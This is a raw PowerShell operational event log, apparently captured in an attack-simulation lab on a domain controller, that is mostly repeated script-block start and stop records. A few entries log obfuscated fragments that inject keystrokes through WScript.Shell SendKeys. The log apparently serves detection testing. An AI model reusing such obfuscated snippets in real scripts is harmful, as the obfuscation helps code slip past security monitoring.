EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469908
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469907
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469906
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1469905
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{[Char]$_}

ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Path:
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476265
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0ffbec22-51e1-4872-92b1-84b78d34aa0b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476264
Keywords=None
Message=Started invocation of ScriptBlock ID: 0ffbec22-51e1-4872-92b1-84b78d34aa0b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476263
Keywords=None
Message=Completed invocation of ScriptBlock ID: 0ffbec22-51e1-4872-92b1-84b78d34aa0b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476262
Keywords=None
Message=Started invocation of ScriptBlock ID: 0ffbec22-51e1-4872-92b1-84b78d34aa0b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476261
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$wshell.SendKeys((Item Variable:_).Value)}

ScriptBlock ID: 0ffbec22-51e1-4872-92b1-84b78d34aa0b
Path:
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476260
Keywords=None
Message=Completed invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476259
Keywords=None
Message=Started invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476258
Keywords=None
Message=Completed invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476257
Keywords=None
Message=Started invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476256
Keywords=None
Message=Completed invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476255
Keywords=None
Message=Started invocation of ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476254
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{$wshell.SendKeys((Variable _).Value)}

ScriptBlock ID: 19d9b6c3-7598-4877-a268-bbaea307aef1
Path:
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476253
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476252
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476251
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476250
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476249
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476248
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476247
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476246
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476245
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476244
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476243
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476242
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476241
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476240
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476239
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476238
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476237
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476236
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476235
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476234
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476233
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476232
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476231
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476230
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476229
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476228
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476227
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476226
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476225
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476224
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476223
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476222
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476221
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476220
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476219
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476218
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476217
Keywords=None
Message=Completed invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476216
Keywords=None
Message=Started invocation of ScriptBlock ID: fb517ff6-117d-4016-838c-7ad2e5d6b68b
Runspace ID: cb9b6f9b-70d3-4a16-9e78-6ec32f7e6098
06/15/2021 05:01:34 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
